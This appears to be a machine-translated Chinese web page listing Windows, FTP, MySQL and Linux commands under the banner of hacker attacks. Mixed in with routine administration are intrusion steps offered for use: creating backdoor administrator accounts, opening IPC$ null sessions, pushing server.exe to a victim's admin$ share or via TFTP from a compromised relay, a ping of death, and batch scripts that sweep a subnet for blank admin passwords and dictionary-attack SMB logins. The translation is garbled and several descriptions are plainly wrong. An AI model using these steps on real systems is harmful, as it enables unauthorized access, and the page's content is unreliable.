Hacker attacks commonly used cmd command Daquan

Source: Internet
Author: User
Tags exit in ftp connection net command net time net send nslookup nslookup tool disk defragmenter

Hacker Common Command Daquan
NET user Heibai Lovechina/add plus one heibai password for Lovechina
net localgroup Administrators heibai/add him into the administrator group
net start Telnet on each other's Telnet service
NET use z:\$ map each other's C-drive
NET use \\ip\ipc$ ""/user: "" to establish an IPC NULL link
NET use \\ip\ipc$ "password"/user: "username" establishes IPC non-null link
NET use h: \\ip\c$ "password"/user: "User name" mapping the other side after direct login C: to the local H:
NET use H: \\ip\c$ maps after login C: to Local H:
NET use \\ip\ipc$/del remove IPC links
NET use H:/del to delete mappings that map each other to local H:
NET user username password/add set up users
NET user to see which users are
NET user account name to view the properties of the account

NET user Guest/active:yes activates the guest user
NET user Guest Lovechina change the password of guest to Lovechina
NET user username/delete Delete users
NET user guest/time:m-f,08:00-17:00 means that the guest user is logged on for the net user guest/time:m,4am-5pm;t,1pm-3pm;w-f,8:00-17:00 from Monday to Friday The Guest user login time is Monday 4:00/17:00, Tuesday 13:00/15:00, Wednesday to Friday 8:00/17:00.

NET user Guest/time:all means there is no time limit.

NET user Guest/time indicates that the guest user can never log on. But only limit the time of landing, not the Internet time

NET time \\ to get each other's times,
Get c:\index.htm D:\ The uploaded file is index.htm, it is located under C +, and is uploaded to the other d:\
Copy index.htm \\\c$\index.htm local C drive index.htm copied to C drive
net localgroup Administrators user name/add Add "user" to the administrator to have administrator privileges, note: After the administrator plus s with plural
net start to see which services are open
Net start service name (e.g.: net start Telnet, net start schedule)
NET stop service name stops a service
NET time \ \ Destination IP to view the offset
NET time \ \ target Ip/set to set the local computer time to synchronize with the "Destination IP" host, plus the parameter/yes to cancel the confirmation message net view to see which shares are turned on in the local area network
NET view \\ip see which shares are turned on in the other LAN
NET config display system network settings
NET logoff disconnected sharing
NET Pause Service name pauses a service
NET send IP "text message" to the other party to send messages
NET ver LAN network connection types and information that are in use
NET share viewing locally-enabled shares
NET share ipc$ turn on ipc$ sharing
NET share ipc$/del Delete ipc$ share
NET share C $/del removal of C. shared
NET user Guest 12345 log in with guest user and change password to 12345
NET password Password change system login password
Netstat-a See which ports are open, common Netstat-an
Netstat-n View Port network connectivity, common Netstat-an
Netstat-v viewing work in progress
Netstat-p protocol Example: Netstat-p TCQ/IP Viewing a protocol usage (viewing TCP/IP protocol usage)
Netstat-s View all protocol usage in use
nbtsta*-* * * * each other 136 to 139 one of the ports open, you can see the other person recently logged in user name (03 before the user name)-Note: parameter-A to capitalize
Tracert-parameter IP (or computer name) trace route (packet), Parameter: "-W number" is used to set the time-out interval.
Ping IP (or domain name) sends the default size of 32 bytes of data to the host, parameter: "-l[space" packet size ";"-N Send data Number ";"-T "means to ping all the time.
PING-T-l 65550 ip death ping (send files larger than 64K and Ping is the ping of death)
Ipconfig (winipcfg) for Windows NT and XP (Windows 95 98) To view the local IP address, ipconfig the available parameters "/all" To display all configuration information
TLIST-T Displays the process as a tree list (additional tools for the system, which are not installed by default, within the Support/tools folder of the installation directory)
KILL-F process name plus-F parameter force end a process (additional tools for the system, default is not installed, in the Support/tools folder of the installation directory)
Del-f file name plus-f parameter can be deleted read-only files,/ar,/ah,/as,/AA respectively for the deletion of read-only, hidden, system, archive files,/a-r,/a-h,/a-s,/a-a means to delete files except read-only, hidden, system, archive. For example, "del/ar * *" means deleting all read-only files in the current directory, "Del/a-s * *" means deleting all files except system files in the current directory

DEL/S/q directory or use: rmdir/s/q directory/S to delete all subdirectories and files under directories and directories. Use the parameter/q at the same time to cancel the system confirmation when the delete operation is deleted directly. (two commands function the same)
Move drive letter \ path \ file name to be moved the path of the moved file \ Move the file name after moving, with the parameter/y will cancel to confirm that the mobile directory exists the same file prompt to overwrite directly
FC One.txt two.txt > 3st.txt compare two files and output the differences to the 3st.txt file, ">" and "> >" are redirect commands
At ID number to open a scheduled task that has already been registered
At/delete Stop all scheduled tasks, use parameter/yes to stop directly without confirmation
At ID number/delete stop a registered scheduled task
At View all scheduled tasks
At \\IP time program name (or a command)/R run the other program and restart the computer at some point
Finger username @host See which users have logged in recently
Telnet IP port far and landing server, default port is 23
Open IP connection to IP (after telnet login command)
Telnet directly on this computer telnet will enter the native Telnet
Copy path \ file name 1 path \ filename 2/y copy file 1 to the specified directory is file 2, with the parameter/y to cancel the confirmation you want to overwrite an existing directory file
Copy C:\srv.exe $ ">\\ip\admin$ Copy Local c:\srv.exe to each other under admin
Cppy 1st.jpg/b+2st.txt/a 3st.jpg will 2st.txt content hide to 1st.jpg to generate 3st.jpg new file, Note: 2st.txt file header to empty three rows, parameters:/b refers to binary files,/a refers to the ASCLL format file
Copy $\svv.exe ">\\ip\admin$\svv.exe c \ Or: copy\\ip\admin$\*.* Copy the Srv.exe file (all files) under the admini$ share to local C:
xcopy to copy files or directory tree destination address \ directory name copy file and directory tree, with parameter/y will not prompt overwrite same file
Tftp-i own IP (using meat machine as a springboard when this with meat machine IP) get Server.exe C:\server.exe after landing, the "IP" Server.exe download to the target host C:\server.exe parameters:-I refers to the binary mode of transmission, If the exe file is transferred, if not plus-I is transmitted in ASCII mode (transfer text file mode)
Tftp-i the other IP put C:\server.exe login, upload the local c:\server.exe to the host
The FTP IP port is used for uploading files to the server or for file operations, and the default port is 21. Bin refers to binary mode (executable file); The default is ASCII format (when text files are sent)
Route print shows the IP route, which will primarily display network address addres, subnet mask netmask, gateway address, Gateways Addres, interface address interface
ARP view and process ARP cache, ARP is the meaning of name resolution, is responsible for the resolution of an IP to a physical MAC address. ARP-A will show all the information
Start Program name or command/max or/min opens a new window and maximizes (minimizes) the running of a program or command
Mem View CPU Usage
attrib file name (directory name) to view the properties of a document (directory)
attrib file name-a-r-s-h or +a +r +s +h Remove (add) a file of the archive, read-only, system, hidden properties; + is added as a property
Dir view file, Parameters:/q Display file and directory belongs to the system which user,/T:C display file creation time,/t:a show the last time the file was accessed,/t:w last modified time
date/t, time/t using this parameter, "date/t", "time/t" will display only the current date and time without having to enter a new date and time
SET specifies the environment variable name = The character to assign to the variable set environment variable
Set shows all the current environment variables
Set P (or other character) displays all environment variables currently starting with the character P (or other characters)
Pause pauses the batch process and displays: Press any key to continue ....
If conditional processing is performed in a batch program (see the IF command and variable for more instructions)
Goto label directs cmd.exe to labeled rows in a batch program (labels must be on a separate line with a colon, for example: ": Start" tab)
Call path \ batch file name calls another batch program from the batch program (for more instructions, see Calling/?)
For each file in a set of files, execute a specific command (see the for command and variable for more instructions)
echo on or off turns echo on or off, and the current ECHO setting is displayed only with echo without parameters
Echo information Displays information on the screen
echo Info >> pass.txt Saving "info" to a pass.txt file
findstr "Hello" aa.txt looking for string Hello in Aa.txt file
Find filename finds a file
Title Title name change cmd window title name
A color color value sets the cmd console foreground and background color; 0 = black, 1 = blue, 2 = green, 3 = Light green, 4 = red, 5= violet, 6 = yellow, 7 = white, 8 = Gray, 9 = blue, a= green, b= light aqua, c= red, d= light purple, e= yellow, f= bright white
Prompt name change cmd.exe display command prompt (change C: \, d:\ to entsky\)
Print file name prints text files

VER displays version information under a DOS window
Winver Pop-up window displays version information (memory size, system version, patch version, computer name)
Format drive letter/fs: Type formatted disk, type: FAT, FAT32, NTFS, Example: Format D:/fs:ntfs
MD Directory Name creation directory
Replace the file's directory replacement file to replace the source file
ren original filename new file name rename filename
Tree displays a table of contents, with parameter-F to list the file names in the first folder
Type file name Displays the contents of the text file
More file name display output file by screen
Doskey the command to lock = character
Doskey to unlock command = Lock command provided for DOS (Edit command line, Recall Win2K command, and create macro). such as: Lock dir command: Doskey Dir=entsky (cannot use Doskey dir=dir); Unlock: Doskey dir=
Taskmgr Bring up Task Manager
chkdsk/f d: Check disk D and Display status report, add parameter/F and Repair errors on disk
tlntadmn telnt service admn, type tlntadmn select 3, and then select 8, you can change the Telnet service default port 23 to any other port
Exit Cmd.exe program or currently, use the parameter/b to exit the current batch script instead of Cmd.exe
Path path \ The file name of the executable file is set to an executable file.
CMD launches a Win2K command Interpretation window. Parameters:/eff,/en Close, open command extension, more details see CMD/?
REGEDIT/S registry File name Import registry, parameters/s refers to quiet mode import, without any hint;
regedit/e registry File name Export Registry
The cacls filename parameter displays or modifies the File access control List (ACL)-when it is formatted for NTFS. Parameter:/d Username: Set deny user access;/p user name: Perm Replace the access rights of the specified user;/g user name: Perm gives the specified user access; Perm can be: N None, R read, W write, C Change (write), F Full Control; Example: cacls D:\te ST.TXT/D pub set D:\test.txt deny pub user access.
cacls file name to view a list of Access user rights for files
REM text content add annotations to a batch file
Netsh view or change the configuration of the local network

IIS Service commands:
Iisreset/reboot Restart the Win2K computer (but prompted the system will restart the message appears)
Iisreset/start or stop to start (stop) all Internet services
Iisreset/restart stop and then restart all Internet services
Iisreset/status Show all Internet service status
Iisreset/enable or disable enable (disable) Restart of Internet services on the local system
Iisreset/rebootonerror If an error occurs when you start, stop, or restart the Internet service
Iisreset/noforce If you cannot stop Internet services, you will not be forced to terminate Internet services
Iisreset/timeout Val still does not stop Internet service when it arrives over time (seconds), and if you specify the/rebootonerror parameter, the computer will reboot. The default value is 20 seconds to restart, 60 seconds to stop, and 0 seconds to reboot.
FTP command: (Details are explained later)
The command line format for FTP is:
Ftp-v-d-i-n-g[Host name]-V displays all the response information for the remote server.
-D uses debug mode.
-N Restricts automatic logon of FTP, that is, the. netrc file is not used.
-G cancels the global file name.
Help [command] or? [command] View command description
Bye or quit terminates the host FTP process and exits the FTP management mode.
PWD lists the current remote host directory
Put or send local file name [upload file name on host] to transfer local files to the remote host
Get or recv [remote host file name] [filename downloaded to local] is transferred from the remote host to the local host
Mget [Remote-files] receives a batch of files from the remote host to the local host
Mput Local-files transfers A batch of files from the local host to the remote host
dir or LS [remote-directory] [local-file] lists the files in the current remote host directory. If you have a local file, write the results to a local file
ASCII settings transfer files in ASCII mode (default value)
Bin or image settings to transfer files in binary mode
Bell every time a file transfer, Alarm prompts
Cdup return to the top level directory
Close interrupts the FTP session with the remote server (corresponding to open)
Open Host[port] Establish a specified FTP server connection to specify the connection port
Delete deletes files from the remote host
Mdelete [remote-files] Deleting a batch of files
mkdir directory-name Creating directories in the remote host
Rename [from] [to] changes the file name in the remote host
RmDir directory-name Delete Directories in the remote host
Status displays the state of the current FTP
System displays the remote host systems type
User user-name [Password] [account] re-login to the remote host with another user name
Open host [port] re-establishes a new connection
Prompt interactive Prompt mode
MACDEF Defining macro Commands
The LCD changes the working directory of the current local host and, if default, goes to the home directory of the current user
chmod changing the file permissions of the remote host
Case when on, use the mget command to copy the file name to the local machine, all converted to lowercase letters
CD Remote-dir into the remote host directory
Cdup Enter the parent directory of the remote host directory
! Perform an interactive shell,exit in the local machine back to the FTP environment, such as!ls*.zip

MYSQL command:
Mysql-h host Address-u user name-p password connect MySQL; If you just installed MySQL, Superuser Root does not have a password.
(Example: mysql-h110.110.110.110-uroot-p123456
Note: You and root can use no spaces, others are the same)
Exit MySQL
Mysqladmin-u username-p Old password password new password change password
Grant SELECT on database. * To User name @ login host identified by \ "Password \"; Add new users. (Note: Unlike the above, the following is because it is a command in a MySQL environment, so it is followed by a semicolon as a command terminator)
show databases; Displays the list of databases. Just started with two databases: MySQL and test. MySQL Library is very important it has the MySQL system information, we change the password and the new user, is actually using this library to operate.
Use MySQL;
Show tables; Displaying data tables in a library
describe table name; Show the structure of a data table
Create database name; Build Library
Use library name;
CREATE TABLE table name (field settings list);
drop database name;
drop table name, delete library and delete table
Delete from table name; Empty records in a table
SELECT * from table name; Show records in a table
mysqldump--opt school>school.bbb Backup database: (Command executed under DOS \\mysql\\bin directory); NOTE: Back up the database school to the school.bbb file, school.bbb is a text file, the filename is taken, open to see what you will find.
New commands under Win2003 System (Practical section):
Shutdown/Parameters Close or restart the local or remote host.
Parameter description:/S shutdown host,/R restart host,/T number set delay time, range between 0-180 seconds,/A Cancel boot,/M//IP specified remote host.
Example: SHUTDOWN/R/T 0 restart the local host immediately (no delay)
Taskill/Parameter The process name or PID of the process terminates one or more tasks and processes.
Parameter description:/pid to terminate the PID of the process, the tasklist command can be used to obtain the process name of the process pid,/im to be terminated by the process,/F to terminate the process,/T to terminate the specified process and the child process he initiated.
TASKLIST Displays the process identifier (PID) of processes, services, and services that are currently running on local and remote hosts.
Parameter description:/M lists the DLL files that are loaded by the current process,/SVC displays the services for each process, and lists only the current processes without parameters.

Linux system basic commands: to distinguish case
Uname display version information (same as Win2K ver)
DIR Displays the current directory file, Ls-al display includes hidden files (dir with Win2K)
PWD Query the directory location where you are currently located
CD CD. Go back to the previous level and note the CD with the. There are spaces between them. CD/Return to the root directory.
Cat file name view file contents
Cat >abc.txt The contents of the Abc.txt file.
More file names display a text file in a page-by-page fashion.
CP Copy File
MV Moving files
RM file name Delete file, rm-a directory name delete directory and subdirectories
mkdir Directory name creation directory
RmDir Delete subdirectories, there are no documents in the directory.
chmod setting access rights to files or directories
Grep finds a string in the archive
Diff file Comparison
Find Archive Search
Date, time of day
Who queries the person who is currently using the same machine as you and the login time location
W Query the details of the current person on the machine
WhoAmI to see your account name
Groups to see someone's group
passwd Change Password
History View the commands you've been under
PS Display process Status
Kill stops a process
GCC hackers usually use it to compile files written in C language.
The SU permission is converted to the specified consumer
Telnet IP Telnet connects to the other host (same as Win2K), indicating that the connection was successful when bash$ was present.
FTP FTP connection on a server (same as Win2K)

Attached: Batch commands and variables

1:for command and variable basic format:
For/Parameter%variable in (set) do command [command_parameters]%variable: Specifies a single-letter replaceable parameter, such as:%i, while specifying a variable is used:%%i, while the variable is called with:%i%, the variable is Case-sensitive (%i not equal to%i).
A total of 10 variables can be processed per batch from%0-%9, where%0 is used by default for the batch file name, and%1 defaults to the first value entered when using this batch, similarly:%2-%9 refers to the 第2-9个 value entered; Example: NET use $ ">\\ip\ipc$ Pass/user : The user has an IP of%1,pass%2 and user%3

(set): Specify a file or set of files that can use wildcards such as: (D:\user.txt) and (1 1 254) (1-1 254), {"(1 1 254)" The first "1" refers to the starting value, the second "1" refers to the increment, and the third "254" refers to the ending value, i.e. from 1 to 254; (1-1 254) "Description: From 254 to 1}

Command: Specify commands for the first file, such as the net USE command, and command this:& to separate commands when executing multiple commands
Command_parameters: Specifying parameters or command-line switches for specific commands

In (set): Refers to the value in the (set); Do command: means the command

Parameter:/L refers to increment form {(set) as increment when};/f refers to the constant fetching of values from a file until {(set) is a file, such as when (D:\pass.txt)}.
Examples of usage:
@echo off
echo usage format: Test.bat *.*.* > Test.txt

FOR/L%%g in (1 1 254) does echo%1.%%g >>test.txt & net use \\%1.%%g/user:administrator | Find "command completed successfully" >>test.txt
Save As Test.bat Description: For a specified class C segment of the 254 IP to try to establish a administrator password is empty ipc$ connection, if successful, the IP exists test.txt.

/L refers to the increment form (that is, from 1-254 or 254-1), the IP front three bits of the input: *.*.* is the default%1;%%g for batch processing (last of IP);& is used to separate the two commands for Echo and net use; Find in the results to see if there is a "command completed successfully" information;%1.%%g is the full IP address; (1 1 254) refers to the starting value, the increment, the value of the knot.
@echo off
echo Usage format: Ok.bat IP
for/f%%i in (D:\user.dic) do smb.exe%1%%i D:\pass.dic 200
Save As: Ok.exe Description: After entering an IP, use the dictionary file d:\pass.dic to d:\user.dic the user password, until the value in the file is finished. %%i is the user name;%1 is the IP address entered (default).

NET command for alternative usage

Net user command is a DOS command that must be run in MS-DOS mode under Windows XP, so first go to MS-DOS mode: Select the "Command Prompt" option from the "Accessories" tab of the Start menu, or the "Run" option on the Start menu (the shortcut is the win +R), enter "cmd.exe" into MS-DOS mode. The following features are based on this mode.

To create a normal new user, enter the following command in the MS-DOS prompt: "NET user John 123/add", carriage return. You can create a new user named "John" with a password of "123". The add parameter represents the new user.

It is worth noting that the user name can be up to 20 characters and the password can be up to 127 characters.

Establish a user with limited login time the following methods can be used to control the computer's use time. For example, you need to create a John user account with a password of "123" and a login right from Monday to Friday, from eight a.m. to 10 o'clock in the morning and from seven o'clock to nine o'clock at night on weekends.

1.12-hour system you can type the following command: "NET user John 123/add/times:monday-friday,8am-10pm;saturday-sunday,7pm-9pm", enter OK.

2.24-hour system you can type the following command: "NET user John 123/add/times:m-f,8:00-22:00;sa-su,19:00-21:00", enter OK.

It is important to note that the time increment value is limited to 1 hours. For day values, you can use a full name or abbreviation (that is, M, T, W, Th, F, Sa, Su). The 12-hour or 24-hour notation can be used. For 12-hour notation, please use AM, PM, or a.m., P.M.. The all value indicates that the user is always able to log on, and a null value (blank) means that the user can never log on. Separate the date and time with a comma, separating the date and time units (for example, m,4am-5pm;t,1pm-3pm) with semicolons. Do not use spaces when specifying a time.

In addition, the Passwordchg:{yesno} parameter can be used to specify whether the user can change his or her password, which is set to Yes by default. Limit user usage time the Net user command can also use parameters expires:{{mm/dd/yyyy dd/mm/yyyy mmm , DD, yyyy} never} user accounts are qualified to expire according to the specified date. The expiration date can be [mm/dd/yyyy], [dd/mm/yyyy], or [mmm,dd,yyyy] format. It depends on the country (region) code. The user account expires at the beginning of the specified date. For month values, you can use a number, full name, or three-letter abbreviation (that is, Jan, Feb, Mar, APR, May, June, Jul, April, Sep, Oct, Nov, Dec). For year values, you can use either two-digit or four-digit numbers, separate the parts of the date with commas and slashes, and do not use spaces.

Use of netsh (photos)

A friend asked me, "Can you directly modify the IP address of Windows2000 under the command line?" ”。
Of course, it's possible. Not only can the IP address be modified, but every detail associated with the network can be configured in the command line mode.
But generally people are not very accustomed to it.
The method is "Netsh" using a command-line tool provided in the system:
First, look at your current IP address:

Two network cards are listed, with the interface named "Local Area Connection" configured for this NIC:
A fixed IP is used, where the IP address is, other information slightly (you will not see AH)
Okay, let's change this IP.
Change it to something, a little bit:

Now the IP is
In fact, just changed the IP time and did not write the command complete, complete look at this:

A bunch of commands, now the IP address has been modified to
Of course, the command line to modify the IP can also be used only 1 command

To here, the most simplest feature of Netsh, the command line under the modified IP address has been said
See a friend is to do network management, the company manages a few different networks, each time to embrace the notebook to change to different IP address, different subnet mask 、、、 in fact, as long as the full Play Netsh script function, you can most quickly modify their network configuration.
First, a configuration script is displayed

We enter the Netsh environment and switch to the interface IP environment
The current configuration is displayed through the dump command.
Step two, export a configuration script

In this way, we save the configuration script we just showed as a file c:\interface.txt
The third step, copy a script copy interface2.txt and modify it
Reason? Simple, in order to more convenient switch network environment AH

Note that we have modified the IP address, subnet mask, gateway, and DNS that we need to modify.
Finally, the new configuration file is imported directly into the system.

Here, the network configuration section has been modified

The configuration script can be displayed directly through the dump command in Netsh.
The configuration script can be exported by Netsh-c interface IP dump >c:\interface.txt.
And then Netsh-f c:\interface.txt the way again can be exported to the configuration script back.
One to the other, you can easily realize the convenience of modifying the network configuration.
There are many more commands in Netsh, such as the ability to enter the Netsh environment after the root-level directory with the EXEC command
You can also load a configuration script.
Also, the configuration of network services such as WINS, routing, and RAS can also be directly manipulated through Netsh's built-in commands.
There is an introduction to the Windows Help.

Complete Computer Run command

Winver---------Check the Windows version
Wmimgmt.msc----open Windows Management architecture
Wupdmgr--------Windows Update
Winver---------Check the Windows version
Wmimgmt.msc----open Windows Management architecture
Wupdmgr--------Windows Update
wscript--------Windows Script Host Settings
Write----------WordPad winmsd-----System Information
Wiaacmgr-------Scanner and Camera Wizard
Winchat--------XP comes with LAN chat
Mem.exe--------Show Memory usage
Msconfig.exe---System Configuration Utility
Mplayer2-------Easy widnows Media Player
MSPaint--------Drawing Board
MSTSC----------Remote Desktop Connection
Player2-------Media Player
Magnify--------Magnifier Utility
MMC------------Open the console
Mobsync--------Synchronization commands
DxDiag---------Checking DirectX information
DRWTSN32------System Doctor
Devmgmt.msc---Device Manager
Dfrg.msc-------Disk Defragmenter
Diskmgmt.msc---Disk Management utility
DCOMCNFG-------Open System Component Services
DdeShare-------turn on DDE sharing settings
Dvdplay--------DVD Player
net stop Messenger-----Stop messenger Service
net start Messenger----Start Messenger Service
Notepad--------Open Notepad
Nslookup Tool Wizard for-------Network management
ntbackup-------system backup and restore
Narrator-------Screen Narrator
Ntmsmgr.msc----Mobile Storage Manager
Ntmsoprq.msc---Mobile Storage Administrator action Request
Netstat-an----(TC) command Check interface
Syncapp--------Create a Briefcase
Sysedit--------System Configuration Editor
Sigverif-------File Signature Validator
SHRPUBW--------Create a shared folder
Secpol.msc-----Local Security Policy
SYSKEY---------System encryption, once encrypted can not be solved, protect the Windows XP system dual Password
Services.msc---Local Service settings
SNDVOL32-------Volume Control program
Sfc.exe--------System File Checker
Sfc/scannow---Windows File Protection
Nslookup-------60-second Countdown shutdown command
Tourstart------XP profile (roaming XP programs that appear after installation is complete)
Taskmgr--------Task Manager
EVENTVWR-------Event Viewer
Eudcedit-------Character-font procedure
Explorer-------Open Resource Manager
Packager-------Object Wrapping Program
PERFMON.MSC----Computer Performance monitoring Program
ProgMan--------Program Manager
Regedit.exe----Registration Form
Rsop.msc-------Group Policy result set
Regedt32-------Registry Editor
Rononce-p----15-second shutdown
regsvr32/u *.dll----Stop DLL file to run
regsvr32/u zipfldr.dll------Cancel Zip support
Cmd.exe--------cmd command prompt
Chkdsk.exe-----CHKDSK disk Check
Certmgr.msc----Certificate Management Utility
Calc-----------Start Calculator
Charmap--------Start character mapping table
CLICONFG-------SQL SERVER Client Network Utility
CLIPBRD--------Clipboard Viewer
Conf-----------start NetMeeting
Compmgmt.msc---Computer Management
cleanmgr-------* * Finishing
CIADV.MSC------Indexing Service Program
OSK------------Open the On-screen keyboard
ODBCAD32-------ODBC data Source Manager
oobe/msoobe/a----Check if XP is active
Lusrmgr.msc----native Users and Groups
Logoff---------Logoff command
IExpress-------Trojan Bundle tool, System comes with
Nslookup-------IP Address detector
Fsmgmt.msc-----shared Folder Manager
Utilman--------Utility Manager
Gpedit.msc-----Group Policy

Hacker attacks commonly used cmd command Daquan

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.